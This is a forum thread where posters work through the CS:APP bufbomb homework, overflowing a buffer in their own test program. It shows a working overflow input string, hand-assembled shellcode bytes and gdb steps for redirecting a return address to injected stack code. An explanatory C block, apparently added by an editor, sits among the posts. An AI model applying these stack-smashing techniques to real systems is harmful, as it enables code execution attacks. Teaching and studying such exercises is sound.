ChinaUnix forum
Thread starter: converse

[Fun] Buffer overflow attack experiment

#41 | Posted 2004-12-25 18:50


pigjj@Ale:~/prog/c/atack$ uname -a
Linux Ale 2.4.26-1-386 #1 Thu Jul 22 12:46:23 JST 2004 i686 GNU/Linux
pigjj@Ale:~/prog/c/atack$ gcc -v
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.4/specs
Configured with: ../src/configure -v --enable-languages=c,c++,java,f77,pascal,objc,ada,treelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.4 (Debian 1:3.3.4-3)
pigjj@Ale:~/prog/c/atack$ ./a.out
Type Hex string:12345678 12345678 12345678 12345678 12345678 12345678 f8efffbf eb840408 44686408 efbeadde d8f9ffbf 27850408
getbuf returned 0xdeadbeef


I got it  

#42 | Posted 2005-02-17 16:20

Everyone above modified test's return address; do you think modifying getbuf's return address is feasible?

I'd like to first post the original problem from the book I'm reading.
The code is here: http://csapp.cs.cmu.edu/public/code.html    bufbomb.c
Problem:
Homework Problem 3.38 [Category 3]:

In this problem, you will mount a buffer overflow attack on your own program.

As stated earlier, we do not condone using this or any other form of attack to gain unauthorized access to a system, but by doing this exercise, you will learn a lot about machine-level programming.

Download the file bufbomb.c from the CS:APP website and compile it to create an executable program.

In bufbomb.c, you will find the following functions:
int getbuf()
{
    char buf[12];
    getxs(buf);
    return 1;
}

void test()
{
    int val;
    printf("Type Hex string:");
    val = getbuf();
    printf("getbuf returned 0x%x\n", val);
}
The function getxs (also in bufbomb.c) is similar to the library gets, except that it reads characters encoded as pairs of hex digits. For example, to give it a string "0123," the user would type in the string "30 31 32 33." The function ignores blank characters. Recall that decimal digit x has ASCII representation 0x3x.

A typical execution of the program is as follows:
unix> ./bufbomb
Type Hex string: 30 31 32 33
getbuf returned 0x1
Looking at the code for the getbuf function, it seems quite apparent that it will return value 1 whenever it is called. It appears as if the call to getxs has no effect.

Your task is to make getbuf return -559038737 (0xdeadbeef) to test, simply by typing an appropriate hexadecimal string to the prompt.

Here are some ideas that will help you solve the problem:
Use OBJDUMP to create a disassembled version of bufbomb. Study this closely to determine how the stack frame for getbuf is organized and how overflowing the buffer will alter the saved program state.

Run your program under GDB. Set a breakpoint within getbuf and run to this breakpoint. Determine such parameters as the value of %ebp and the saved value of any state that will be overwritten when you overflow the buffer.

Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this file with GCC and disassemble it with OBJDUMP. You should be able to get the exact byte sequence that you will type at the prompt.

OBJDUMP will produce some pretty strange looking assembly instructions when it tries to disassemble the data in your file, but the hexadecimal byte sequence should be correct.

Keep in mind that your attack is very machine and compiler specific. You may need to alter your string when running on a different machine or with a different version of GCC.

#43 | Posted 2005-02-17 17:01

My understanding is that the problem wants us to enter some executable machine instructions when feeding data into buf[]. On my machine, getbuf's stack frame looks like this:

return address | test's frame; holds the address of the instruction after call getbuf
saved %ebp     | <- %ebp; getbuf's frame starts here; holds test's frame pointer
_______________|
_______________|
_______________|
_______________|
_______________|
_______________| buf[]

My idea is to run bufbomb under gdb, set a breakpoint at getbuf, and when execution reaches getbuf:
        print /x $ebp
                 gives getbuf's frame pointer; suppose the result is 0xbfffffc0
        print /x *(unsigned*) 0xbfffffc0
                 gives test's frame pointer, stored at getbuf's frame pointer
        print /x ($ebp-24)
                 gives the address of buf[]

Then we fill buf[] with 8 bytes of data, leaving aside for now how to write the machine instructions:

changed to buf[]'s address | return address
kept at its original value | <- %ebp
90   90  90  90            |
90   90  90  90            |
90   90  90  90            |
90   90  90  90            |
90   90  90  90            |
90   90  90  90            | buf[]

Now replace the 90 bytes with the machine-code encoding of the following assembly; suppose that, under normal execution, the address of the instruction after call getbuf is 0Xxxxxxxxx:

movl $0xdeadbeef,%eax
pushl $0Xxxxxxxxx
ret

Do you think this method can work? I've tried overwriting the return address with the address of an arbitrary already-compiled instruction, and that succeeds. But when I overwrite the return address with buf[]'s address, a segmentation fault occurs when getbuf rets back to test.
Why does the segmentation fault occur here? How can I ret into this part of the stack frame?

The trailing '\0' at the end of the data entered into buf shouldn't cause any damage, I think, because overwriting the return address with the address of an arbitrary compiled instruction succeeds.
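To make the getxs encoding described in the problem statement (post #42) and the frame layout sketched in post #43 concrete, here is an added example. It is not code from this thread or from bufbomb.c; the names `hex_decode_bounded`, `le32` and `frame_overlay` are mine, and the frame offsets (buf[] at %ebp-24, saved %ebp at +24, return address at +28, matching the lea -0x18(%ebp) quoted later in the thread) are an assumed model of the 32-bit x86 frame, not real process memory. The decoder accepts the hex-pair format getxs reads and ignores blanks, but unlike getxs it takes a capacity and refuses input that would not fit; that bound is the fix that stops the overflow in the first place. `frame_overlay` only lays decoded bytes over a marker-filled byte array so you can see which slots a given input reaches; the string in `main` is the one typed in post #41.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <ctype.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_nibble(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* getxs-style decoder with a bound (assumed helper, not bufbomb's getxs):
 * pairs of hex digits, blanks ignored. Returns the number of bytes written,
 * or -1 on malformed input or when the input would exceed cap bytes. */
int hex_decode_bounded(const char *s, unsigned char *out, size_t cap) {
    size_t n = 0;
    int hi = -1;                      /* pending high nibble, -1 if none */
    for (; *s; s++) {
        if (isspace((unsigned char)*s)) continue;
        int v = hex_nibble((unsigned char)*s);
        if (v < 0) return -1;
        if (hi < 0) { hi = v; continue; }
        if (n >= cap) return -1;      /* would overflow: refuse, never write past out */
        out[n++] = (unsigned char)((hi << 4) | v);
        hi = -1;
    }
    if (hi >= 0) return -1;           /* odd number of hex digits */
    return (int)n;
}

/* Interpret 4 bytes as a little-endian 32-bit word, the x86 byte order;
 * this is why "efbeadde" in the input reads back as 0xdeadbeef. */
uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Assumed frame model: 24 bytes from buf[0] up to the saved %ebp. */
#define SAVED_EBP_OFF 24
#define RET_OFF       28
#define FRAME_LEN     32

struct frame_view {
    int bytes;           /* decoded byte count, -1 on bad input */
    int clobbers_ebp;    /* input reaches the saved %ebp slot */
    int clobbers_ret;    /* input reaches the return-address slot */
    uint32_t saved_ebp;  /* word that would sit in the saved %ebp slot */
    uint32_t ret_addr;   /* word that would sit in the return-address slot */
};

/* Lay decoded input over a marker-filled model frame (0xAA marks untouched bytes). */
struct frame_view frame_overlay(const char *hex) {
    struct frame_view v = {0};
    unsigned char frame[FRAME_LEN];
    unsigned char tmp[256];
    memset(frame, 0xAA, sizeof frame);
    int n = hex_decode_bounded(hex, tmp, sizeof tmp);
    v.bytes = n;
    if (n < 0) return v;
    memcpy(frame, tmp, (size_t)n < FRAME_LEN ? (size_t)n : FRAME_LEN);
    v.clobbers_ebp = n > SAVED_EBP_OFF;
    v.clobbers_ret = n > RET_OFF;
    v.saved_ebp = le32(frame + SAVED_EBP_OFF);
    v.ret_addr  = le32(frame + RET_OFF);
    return v;
}

int main(void) {
    /* The string typed in post #41 of this thread. */
    const char *s = "12345678 12345678 12345678 12345678 12345678 12345678 "
                    "f8efffbf eb840408 44686408 efbeadde d8f9ffbf 27850408";
    struct frame_view v = frame_overlay(s);
    printf("%d bytes decoded; saved %%ebp slot=0x%08x, return slot=0x%08x\n",
           v.bytes, v.saved_ebp, v.ret_addr);
    /* With a bound equal to the real buffer size the same input is rejected. */
    unsigned char small[12];
    printf("bounded decode into 12 bytes: %d\n",
           hex_decode_bounded(s, small, sizeof small));
    return 0;
}
```

The overlay shows that the 48 decoded bytes run 24 bytes past buf[]'s end, placing 0xbfffeff8 in the saved %ebp slot and 0x080484eb in the return-address slot; the same string fed to the bounded decoder with cap 12 returns -1, which is the behaviour a getxs that knew its buffer size would have.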

#44 | Posted 2005-02-17 19:25

I didn't understand what you mean, embarrassing...

Try posting some screenshots to explain.

#45 | Posted 2005-02-17 19:56

Not fun!
It works fine on Linux, but when I tried it on UnixWare, damn, it wiped out my virtual machine!

#46 | Posted 2005-02-17 22:46

First screenshot: disassembly of test, getbuf and bomb

bomb is a piece of experimental code added to bufbomb.c;
the modified bufbomb.c differs from the original only by the added definition of bomb.

void bomb()
{
  asm("movl $0xdeadbeef,%eax");
  asm("pushl $0x080484e9");
  asm("ret");
}

/* $begin getbuf-c */
int getbuf()
{
    char buf[12];
    getxs(buf);
    return 1;
}

void test()
{
  int val;
  printf("Type Hex string:");
  val = getbuf();
  printf("getbuf returned 0x%x\n", val);
}
/* $end getbuf-c */

[Attachment: snapshot001.jpg]

#47 | Posted 2005-02-17 22:48

Second screenshot: changed getbuf's return address to 0x080484af, success.

[Attachment: snapshot00002.jpg]

#48 | Posted 2005-02-17 23:09

Third screenshot: changed getbuf's return address to the address of buf[], failed.

In the assembly for test in the first screenshot,
80484bf:    8d 45 e8           lea  0xffffffe8(%ebp),%eax
80484c5:    50                 push %eax
we can see that the address of buf[] is %ebp+0xffffffe8, i.e. %ebp-24.

Also from the first screenshot,
movl $0xdeadbeef,%eax
pushl $0x080484e9
ret
corresponds to the machine code
b8 ef be ad de
68 e9 84 04 08
c3
This machine code should be fine (since the experiment in the second screenshot succeeded),
but when getbuf tries to return to buf[] and execute there, a segmentation fault occurs. What do you think the reason is?

[Attachment: snapshot004.jpg]

#49 | Posted 2005-02-18 10:36

I think I roughly know where you went wrong: it's an ordering problem. The machine instructions should be stored from high addresses to low, whereas you stored them from low to high. I don't have time to try it right now, but since you've been online the whole time and I don't want to keep you waiting, I'm replying with this first; I'll try it myself in a bit.

#50 | Posted 2005-02-18 10:49

Haha, thanks a lot; this has bothered me for nearly a month ^^. I can't try it during the day; I have to wait until I get home in the evening.
But I've tried replacing all the machine instructions with 0x90 (nop, no operation), and it still segfaults at getbuf's ret; it seems it never successfully jumps to the buf[] address. I'm still unclear on a lot of basic concepts about processors and memory operations.